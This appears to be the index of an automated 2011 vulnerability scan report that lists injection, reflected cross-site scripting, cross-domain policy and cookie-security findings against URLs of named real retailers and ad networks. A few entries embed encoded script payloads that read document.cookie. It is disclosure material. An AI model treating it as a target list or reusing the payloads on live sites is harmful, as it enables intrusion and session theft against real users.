XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 06:15:01 CDT 2011.


1. SQL injection

1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter]

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2]

1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2]

1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter]

2.2. http://cimg-1.restorationhardware.com/cm [ci parameter]

2.3. http://server.bhphotovideo.com/cm [ci parameter]

3. XPath injection

3.1. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter]

3.2. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter]

3.3. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter]

3.4. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter]

3.5. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter]

3.6. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter]

3.7. http://community.petco.com/n/blogs/blog.aspx [config parameter]

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter]

4. HTTP header injection

4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter]

4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter]

5. Cross-site scripting (reflected)

5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

5.7. http://html.aggregateknowledge.com/iframe [wid parameter]

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.38. http://px.steelhousemedia.com/pr [get_px parameter]

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]

5.40. http://px.steelhousemedia.com/pr [prov_id parameter]

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter]

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.46. http://sv.liveclicker.net/service/api [var parameter]

5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter]

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter]

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]

5.67. http://www.petsmart.com/ [rdir parameter]

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header]

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header]

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie]

5.76. http://www.petco.com/ [ResonanceSegment cookie]

6. Flash cross-domain policy

6.1. http://9d060c.r.axf8.net/crossdomain.xml

6.2. http://a.netmng.com/crossdomain.xml

6.3. http://a.rfihub.com/crossdomain.xml

6.4. http://a.tribalfusion.com/crossdomain.xml

6.5. http://action.mathtag.com/crossdomain.xml

6.6. http://action.media6degrees.com/crossdomain.xml

6.7. http://ad.afy11.net/crossdomain.xml

6.8. http://ad.doubleclick.net/crossdomain.xml

6.9. http://ads.traderonline.com/crossdomain.xml

6.10. http://ads.undertone.com/crossdomain.xml

6.11. http://adserver.veruta.com/crossdomain.xml

6.12. http://altfarm.mediaplex.com/crossdomain.xml

6.13. http://b.scorecardresearch.com/crossdomain.xml

6.14. http://beacon.afy11.net/crossdomain.xml

6.15. http://bp.specificclick.net/crossdomain.xml

6.16. http://bs.serving-sys.com/crossdomain.xml

6.17. http://cebwa.122.2o7.net/crossdomain.xml

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml

6.19. http://customerappreciation.petco.com/crossdomain.xml

6.20. http://d.xp1.ru4.com/crossdomain.xml

6.21. http://data.coremetrics.com/crossdomain.xml

6.22. http://dis.us.criteo.com/crossdomain.xml

6.23. http://fls.doubleclick.net/crossdomain.xml

6.24. http://gsicace.112.2o7.net/crossdomain.xml

6.25. http://hire.jobvite.com/crossdomain.xml

6.26. http://ib.adnxs.com/crossdomain.xml

6.27. http://idcs.interclick.com/crossdomain.xml

6.28. http://marketlive.122.2o7.net/crossdomain.xml

6.29. http://mbox12.offermatica.com/crossdomain.xml

6.30. http://media.fastclick.net/crossdomain.xml

6.31. http://media.gnc.com/crossdomain.xml

6.32. http://media.gsimedia.net/crossdomain.xml

6.33. http://media2.legacy.com/crossdomain.xml

6.34. http://metrics.brookstone.com/crossdomain.xml

6.35. http://metrics.ftd.com/crossdomain.xml

6.36. http://metrics.gnc.com/crossdomain.xml

6.37. http://metrics.mcafee.com/crossdomain.xml

6.38. http://metrics.pacsun.com/crossdomain.xml

6.39. http://metrics.petsmart.com/crossdomain.xml

6.40. http://mlarmani.122.2o7.net/crossdomain.xml

6.41. http://o.toshibadirect.com/crossdomain.xml

6.42. http://pix04.revsci.net/crossdomain.xml

6.43. http://r.turn.com/crossdomain.xml

6.44. http://rpt.footlocker.com/crossdomain.xml

6.45. http://s.xp1.ru4.com/crossdomain.xml

6.46. http://secure-us.imrworldwide.com/crossdomain.xml

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml

6.48. http://server.bhphotovideo.com/crossdomain.xml

6.49. http://sv.liveclicker.net/crossdomain.xml

6.50. http://tags.mediaforge.com/crossdomain.xml

6.51. http://uat.netmng.com/crossdomain.xml

6.52. http://wasc.homedepot.ca/crossdomain.xml

6.53. http://www.mapquestapi.com/crossdomain.xml

6.54. http://www26.orientaltrading.com/crossdomain.xml

6.55. http://ace.imageg.net/crossdomain.xml

6.56. http://ads.adbrite.com/crossdomain.xml

6.57. http://ads.al.com/crossdomain.xml

6.58. http://feeds.bbci.co.uk/crossdomain.xml

6.59. http://gnc.imageg.net/crossdomain.xml

6.60. http://googleads.g.doubleclick.net/crossdomain.xml

6.61. http://images.scanalert.com/crossdomain.xml

6.62. http://images3.pacsun.com/crossdomain.xml

6.63. http://login.dotomi.com/crossdomain.xml

6.64. http://media.restorationhardware.com/crossdomain.xml

6.65. http://newsrss.bbc.co.uk/crossdomain.xml

6.66. https://ordering.ftd.com/crossdomain.xml

6.67. http://pet.imageg.net/crossdomain.xml

6.68. http://rya.rockyou.com/crossdomain.xml

6.69. http://s7.orientaltrading.com/crossdomain.xml

6.70. https://secure.homedepot.ca/crossdomain.xml

6.71. http://static.ak.fbcdn.net/crossdomain.xml

6.72. http://subscriptions.marvel.com/crossdomain.xml

6.73. https://subscriptions.marvel.com/crossdomain.xml

6.74. http://www.acehardware.com/crossdomain.xml

6.75. https://www.acehardware.com/crossdomain.xml

6.76. http://www.armaniexchange.com/crossdomain.xml

6.77. https://www.armaniexchange.com/crossdomain.xml

6.78. http://www.facebook.com/crossdomain.xml

6.79. http://www.ftd.com/crossdomain.xml

6.80. http://www.gnc.com/crossdomain.xml

6.81. https://www.gnc.com/crossdomain.xml

6.82. http://www.homedepot.ca/crossdomain.xml

6.83. http://www.petsmart.com/crossdomain.xml

6.84. https://www.petsmart.com/crossdomain.xml

6.85. http://www.res-x.com/crossdomain.xml

6.86. http://www.helzberg.com/crossdomain.xml

6.87. https://www.helzberg.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml

7.7. http://metrics.ftd.com/clientaccesspolicy.xml

7.8. http://metrics.gnc.com/clientaccesspolicy.xml

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://shoprunner.force.com/content/JsContentElementsGNC

8.2. http://shoprunner.force.com/content/JsContentElementsPET

8.3. http://www.ftd.com/

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

8.5. http://www.petco.com/Secure/Login.aspx

9. SSL cookie without secure flag set

9.1. https://secure.bhphotovideo.com/bnh/controller/home

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

9.4. https://www.acehardware.com/checkout/index.jsp

9.5. https://www.footlocker.com/account/default.cfm

9.6. https://www.footlocker.com/account/default/

9.7. https://www.petsmart.com/coreg/index.jsp

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

9.9. https://ordering.ftd.com/reminder-signin/

9.10. https://ordering.ftd.com/signin/

9.11. https://ordering.ftd.com/signin/

9.12. https://secure.bluenile.com/accounts/account-sign-in.html

9.13. https://www.brookstone.com/favicon.ico

9.14. https://www.brookstone.com/formhandlerservlet

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp

9.16. https://www.restorationhardware.com/my-account/register.jsp

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

10. Session token in URL

10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

10.2. http://t.p.mybuys.com/webrec/wr.do

10.3. http://www.acehardware.com/storeLocServ

10.4. http://www.bluefly.com/

10.5. http://www.bluefly.com/myfly/login.jsp

10.6. http://www.facebook.com/extern/login_status.php

10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif

11. Password field submitted using GET method

11.1. https://ordering.ftd.com/new-signup/

11.2. https://ordering.ftd.com/new-signup/

11.3. https://ordering.ftd.com/reminder-signin/

11.4. https://ordering.ftd.com/reminder-signin/

11.5. https://ordering.ftd.com/signin/

11.6. https://ordering.ftd.com/signin/

11.7. http://shoprunner.force.com/content/JsContentElementsGNC

11.8. http://shoprunner.force.com/content/JsContentElementsPET

11.9. http://www.ftd.com/

11.10. http://www.ftd.com/

11.11. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

11.12. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

12. Cookie scoped to parent domain

12.1. http://eval.bizrate.com/js/survey_126457_1.js

12.2. http://login.dotomi.com/ucm/UCMController

12.3. https://secure.bhphotovideo.com/bnh/controller/home

12.4. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

12.5. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

12.6. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

12.7. http://a.netmng.com/

12.8. http://a.rfihub.com/ca.gif

12.9. http://a.tribalfusion.com/i.cid

12.10. http://action.media6degrees.com/orbserv/hbjs

12.11. http://action.media6degrees.com/orbserv/hbpix

12.12. http://ad.trafficmp.com/a/bpix

12.13. http://ads.adbrite.com/adserver/vdi/684339

12.14. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://ads.revsci.net/adserver/ako

12.20. http://ads.revsci.net/adserver/ako

12.21. http://ads.revsci.net/adserver/ako

12.22. http://ads.revsci.net/adserver/ako

12.23. http://adserver.veruta.com/track.fcgi

12.24. http://b.scorecardresearch.com/p

12.25. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

12.26. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

12.27. http://cdn.www.bluefly.com/media/css/mybluefly.css

12.28. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

12.29. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

12.30. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

12.31. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

12.32. http://dis.us.criteo.com/dis/dis.aspx

12.33. http://html.aggregateknowledge.com/iframe

12.34. http://ib.adnxs.com/pxj

12.35. http://ib.adnxs.com/seg

12.36. http://idcs.interclick.com/Segment.aspx

12.37. http://image2.pubmatic.com/AdServer/Pug

12.38. http://leadback.advertising.com/adcedge/lb

12.39. http://media.fastclick.net/w/tre

12.40. http://media.gnc.com/ipixel

12.41. http://media.gsimedia.net/ipixel

12.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

12.43. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

12.44. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

12.45. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

12.46. https://ordering.ftd.com/reminder-signin/

12.47. https://ordering.ftd.com/signin/

12.48. https://ordering.ftd.com/signin/

12.49. http://phoenix.untd.com/TRCK/RGST

12.50. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

12.51. http://pixel.fetchback.com/serve/fb/pdc

12.52. http://pixel.fetchback.com/serve/fb/ver

12.53. http://pixel.mathtag.com/data/img

12.54. http://pixel.mathtag.com/event/img

12.55. http://pixel.rubiconproject.com/tap.php

12.56. http://pixel.traveladvertising.com/Live/Pixel.aspx

12.57. http://px.steelhousemedia.com/pr

12.58. http://px.steelhousemedia.com/st

12.59. http://r.turn.com/r/beacon

12.60. http://rya.rockyou.com/ams/ptrck.php

12.61. http://s.xp1.ru4.com/meta

12.62. http://sales.liveperson.net/hc/1402662/

12.63. http://sales.liveperson.net/hc/46281118/

12.64. http://sales.liveperson.net/hc/53965383/

12.65. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

12.66. https://secure.bluenile.com/accounts/account-sign-in.html

12.67. http://segment-pixel.invitemedia.com/pixel

12.68. http://srv.clickfuse.com/pixels/create.php

12.69. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

12.70. http://sync.mathtag.com/sync/img

12.71. http://t.p.mybuys.com/webrec/wr.do

12.72. http://tags.mediaforge.com/if/50

12.73. http://tracking.searchmarketing.com/welcome.asp

12.74. http://uat.netmng.com/pixel/

12.75. http://www.bluefly.com/

12.76. http://www.bluefly.com/myfly/forgot_password.jsp

12.77. http://www.bluefly.com/myfly/login.jsp

12.78. http://www.bluenile.com/

12.79. http://www.bluenile.com/build-your-own-diamond-ring

12.80. http://www.bluenile.com/channel-recommendations.html

12.81. http://www.bluenile.com/fbc/setStatus.html

12.82. http://www.footlocker.com/

12.83. http://www.footlocker.com/login/login.cfm

12.84. http://www.footlocker.com/login/login_forgotpassword.cfm

12.85. http://www.footlocker.com/login/login_form.cfm

12.86. https://www.footlocker.com/account/default.cfm

12.87. https://www.footlocker.com/account/default/

12.88. http://www.imiclk.com/cgi/r.cgi

12.89. http://www.linkedin.com/companyInsider

12.90. http://www.petco.com/

12.91. http://www22.glam.com/cTagsImgCmd.act

13. Cookie without HttpOnly flag set

13.1. http://action.media6degrees.com/orbserv/hbjs

13.2. http://core.bluefly.com/cm

13.3. http://eval.bizrate.com/js/survey_126457_1.js

13.4. http://login.dotomi.com/ucm/UCMController

13.5. http://sales.liveperson.net/visitor/addons/deploy.asp

13.6. http://sales.liveperson.net/visitor/addons/deploy.asp

13.7. http://sales.liveperson.net/visitor/addons/deploy.asp

13.8. https://secure.bhphotovideo.com/bnh/controller/home

13.9. https://secure.bluenile.com/926308692/bundles/core.js

13.10. https://secure.bluenile.com/984568475/css/footer.css

13.11. https://secure.bluenile.com/N1374326862/bundles/cart.css

13.12. https://secure.bluenile.com/N1991330425/js/navigation_flyouts_menu.js

13.13. https://secure.bluenile.com/N3371804/bundles/allpages.js

13.14. https://secure.bluenile.com/N3821919/bundles/footer.js

13.15. https://secure.bluenile.com/N518116487/bundles/allpages.css

13.16. https://secure.bluenile.com/N522719515/bundles/ga.js

13.17. https://secure.bluenile.com/N688855944/css/cart_print.css

13.18. https://secure.bluenile.com/accounts/account-sign-in.html

13.19. https://secure.bluenile.com/favicon.ico

13.20. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

13.21. http://t.p.mybuys.com/webrec/wr.do

13.22. http://tracking.searchmarketing.com/welcome.asp

13.23. http://tracking.searchmarketing.com/welcome.asp

13.24. http://tracking.searchmarketing.com/welcome.asp

13.25. http://tracking.searchmarketing.com/welcome.asp

13.26. http://tracking.searchmarketing.com/welcome.asp

13.27. http://tracking.searchmarketing.com/welcome.asp

13.28. http://tracking.searchmarketing.com/welcome.asp

13.29. http://tracking.searchmarketing.com/welcome.asp

13.30. http://tracking.searchmarketing.com/welcome.asp

13.31. http://tracking.searchmarketing.com/welcome.asp

13.32. http://tracking.searchmarketing.com/welcome.asp

13.33. https://www.acehardware.com/checkout/index.jsp

13.34. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

13.35. http://www.bluefly.com/

13.36. http://www.brookstone.com/

13.37. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

13.38. http://www.footlocker.com/

13.39. http://www.footlocker.com/login/login.cfm

13.40. http://www.footlocker.com/login/login_forgotpassword.cfm

13.41. http://www.footlocker.com/login/login_form.cfm

13.42. https://www.footlocker.com/account/default.cfm

13.43. https://www.footlocker.com/account/default/

13.44. http://www.gnc.com/community/index.jsp%20%20

13.45. http://www.helzberg.com/account.do

13.46. http://www.linkedin.com/companyInsider

13.47. https://www.petsmart.com/coreg/index.jsp

13.48. http://www.restorationhardware.com/my-account/sign-in.jsp

13.49. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

13.50. http://a.netmng.com/

13.51. http://a.rfihub.com/ca.gif

13.52. http://a.tribalfusion.com/i.cid

13.53. http://action.media6degrees.com/orbserv/hbpix

13.54. http://ad.trafficmp.com/a/bpix

13.55. http://ad.yieldmanager.com/pixel

13.56. http://ads.adbrite.com/adserver/vdi/684339

13.57. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

13.58. http://ads.revsci.net/adserver/ako

13.59. http://ads.revsci.net/adserver/ako

13.60. http://ads.revsci.net/adserver/ako

13.61. http://ads.revsci.net/adserver/ako

13.62. http://ads.revsci.net/adserver/ako

13.63. http://ads.revsci.net/adserver/ako

13.64. http://ads.revsci.net/adserver/ako

13.65. http://ads.revsci.net/adserver/ako

13.66. http://ads.undertone.com/f

13.67. http://adserver.veruta.com/track.fcgi

13.68. http://b.scorecardresearch.com/p

13.69. http://bluefly.com/

13.70. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

13.71. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

13.72. http://cdn.www.bluefly.com/media/css/mybluefly.css

13.73. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

13.74. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

13.75. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

13.76. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

13.77. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258

13.78. http://cimg-1.restorationhardware.com/cm

13.79. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1

13.80. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1

13.81. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1

13.82. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1

13.83. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1

13.84. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1

13.85. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

13.86. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll

13.87. http://community.petco.com/n/blogs/blog.aspx

13.88. http://community.petco.com/n/pfx/forum.aspx

13.89. http://core.bluefly.com/cm

13.90. http://customerappreciation.petco.com/cm

13.91. http://dis.us.criteo.com/dis/dis.aspx

13.92. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925

13.93. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.94. http://html.aggregateknowledge.com/iframe

13.95. http://idcs.interclick.com/Segment.aspx

13.96. http://image2.pubmatic.com/AdServer/Pug

13.97. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

13.98. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

13.99. http://leadback.advertising.com/adcedge/lb

13.100. http://login.dotomi.com/ucm/UCMController

13.101. http://media.fastclick.net/w/tre

13.102. http://media.gnc.com/ipixel

13.103. http://media.gsimedia.net/ipixel

13.104. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

13.105. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

13.106. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

13.107. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

13.108. https://ordering.ftd.com/reminder-signin/

13.109. https://ordering.ftd.com/signin/

13.110. https://ordering.ftd.com/signin/

13.111. http://phoenix.untd.com/TRCK/RGST

13.112. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

13.113. http://pixel.fetchback.com/serve/fb/pdc

13.114. http://pixel.fetchback.com/serve/fb/ver

13.115. http://pixel.mathtag.com/data/img

13.116. http://pixel.mathtag.com/event/img

13.117. http://pixel.rubiconproject.com/tap.php

13.118. http://pixel.traveladvertising.com/Live/Pixel.aspx

13.119. http://px.steelhousemedia.com/pr

13.120. http://px.steelhousemedia.com/st

13.121. http://r.turn.com/r/beacon

13.122. http://rpt.footlocker.com/eluminate

13.123. http://rya.rockyou.com/ams/ptrck.php

13.124. http://s.xp1.ru4.com/meta

13.125. http://sales.liveperson.net/hc/1402662/

13.126. http://sales.liveperson.net/hc/1402662/

13.127. http://sales.liveperson.net/hc/1402662/

13.128. http://sales.liveperson.net/hc/46281118/

13.129. http://sales.liveperson.net/hc/46281118/

13.130. http://sales.liveperson.net/hc/53965383/

13.131. http://sales.liveperson.net/hc/53965383/

13.132. http://sales.liveperson.net/hc/53965383/

13.133. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

13.134. http://segment-pixel.invitemedia.com/pixel

13.135. http://server.bhphotovideo.com/cm

13.136. http://srv.clickfuse.com/pixels/create.php

13.137. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

13.138. http://subscriptions.marvel.com/checkout/

13.139. http://sync.mathtag.com/sync/img

13.140. http://tags.mediaforge.com/if/50

13.141. http://trvlgrd.netmng.com/

13.142. http://uat.netmng.com/pixel/

13.143. http://web.aisle7.net/jsapi/1.0/content.js

13.144. http://www.acehardware.com/category/index.jsp

13.145. http://www.bhphotovideo.com/bnh/controller/home

13.146. http://www.bluefly.com/__ssobj/ard.png

13.147. http://www.bluefly.com/__ssobj/core.js

13.148. http://www.bluefly.com/favicon.ico

13.149. http://www.bluefly.com/myfly/forgot_password.jsp

13.150. http://www.bluefly.com/myfly/login.jsp

13.151. http://www.bluenile.com/

13.152. http://www.bluenile.com/build-your-own-diamond-ring

13.153. http://www.bluenile.com/channel-recommendations.html

13.154. http://www.bluenile.com/fbc/setStatus.html

13.155. http://www.brookstone.com/favicon.ico

13.156. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

13.157. http://www.brookstone.com/formhandlerservlet

13.158. http://www.brookstone.com/outdoor-living.html

13.159. http://www.brookstone.com/shoppingCart.jsp.vr

13.160. https://www.brookstone.com/favicon.ico

13.161. https://www.brookstone.com/formhandlerservlet

13.162. http://www.gnc.com/home/index.jsp

13.163. http://www.gnc.com/recommendationpixel/user.jsp

13.164. http://www.guitarcenter.com/

